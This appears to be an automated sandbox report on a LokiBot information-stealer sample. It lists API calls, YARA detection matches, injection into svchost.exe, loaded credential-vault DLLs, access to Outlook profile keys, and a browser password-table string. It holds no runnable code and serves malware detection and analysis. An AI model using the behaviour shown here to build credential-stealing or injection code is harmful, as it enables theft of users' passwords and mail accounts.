Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	2_2_00193540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_001933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_001933C0

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00C3A1EF

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C28310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C28310

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C351BD

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BDE6A0	0_2_00BDE6A0
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFD975	0_2_00BFD975
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF21C5	0_2_00BF21C5
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C062D2	0_2_00C062D2
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C503DA	0_2_00C503DA
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C0242E	0_2_00C0242E
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF25FA	0_2_00BF25FA
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE66E1	0_2_00BE66E1
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C2E616	0_2_00C2E616
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C0878F	0_2_00C0878F
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C38889	0_2_00C38889
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C06844	0_2_00C06844
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C50857	0_2_00C50857
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE8808	0_2_00BE8808
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFCB21	0_2_00BFCB21
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C06DB6	0_2_00C06DB6
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE6F9E	0_2_00BE6F9E
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE3030	0_2_00BE3030
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF3187	0_2_00BF3187
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFF1D9	0_2_00BFF1D9
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BD1287	0_2_00BD1287
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF1484	0_2_00BF1484
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE5520	0_2_00BE5520
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF7696	0_2_00BF7696
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE5760	0_2_00BE5760
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF1978	0_2_00BF1978
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C09AB5	0_2_00C09AB5
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BDFCE0	0_2_00BDFCE0
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFBDA6	0_2_00BFBDA6
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C57DDB	0_2_00C57DDB
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF1D90	0_2_00BF1D90
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE3FE0	0_2_00BE3FE0
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BDDF00	0_2_00BDDF00
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011A80B8	0_2_011A80B8
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011AF0C8	0_2_011AF0C8
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_0112489C	0_2_0112489C
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_01121DD4	0_2_01121DD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00192720	2_2_00192720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: String function: 00BD7DE1 appears 35 times
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: String function: 00BF8900 appears 42 times
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: String function: 00BF0AE3 appears 70 times

Source: PRI_VTK250419A.exe, 00000000.00000003.2056402822.0000000003B43000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRI_VTK250419A.exe
Source: PRI_VTK250419A.exe, 00000000.00000003.2058505389.0000000003D9D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRI_VTK250419A.exe

Source: PRI_VTK250419A.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: PRI_VTK250419A.exe PID: 7140, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3868, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@1/1

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C3A06A GetLastError,FormatMessageW,

0_2_00C3A06A

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C281CB AdjustTokenPrivileges,CloseHandle,	0_2_00C281CB
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00C287E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	2_2_0040650A

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C3B3FB

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C4EE0D

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C3C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00C3C397

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00BD4E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00193360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00193360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00193360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00193360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

File created: C:\Users\user\AppData\Local\Temp\autCDC5.tmp

Jump to behavior

Source: PRI_VTK250419A.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000003.2059930033.0000000004F25000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PRI_VTK250419A.exe	Virustotal: Detection: 51%
Source: PRI_VTK250419A.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\PRI_VTK250419A.exe "C:\Users\user\Desktop\PRI_VTK250419A.exe"
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PRI_VTK250419A.exe"
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PRI_VTK250419A.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PRI_VTK250419A.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PRI_VTK250419A.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: PRI_VTK250419A.exe, 00000000.00000003.2058297108.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2056096029.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PRI_VTK250419A.exe, 00000000.00000003.2058297108.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2056096029.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3293974619.0000000000191000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3293974619.0000000000191000.00000020.00000001.01000000.00000005.sdmp

Source: PRI_VTK250419A.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PRI_VTK250419A.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PRI_VTK250419A.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PRI_VTK250419A.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PRI_VTK250419A.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRI_VTK250419A.exe PID: 7140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3868, type: MEMORYSTR

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD4B37 LoadLibraryA,GetProcAddress,

0_2_00BD4B37

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BF8945 push ecx; ret	0_2_00BF8958
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BE8C74 push esp; retn 0000h	0_2_00BE8C76
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011AF53B push ss; iretd	0_2_011AF547
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_01121EC0 push eax; ret	0_2_01121ED4
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_01121EC0 push eax; ret	0_2_01121EFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00193360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00193360

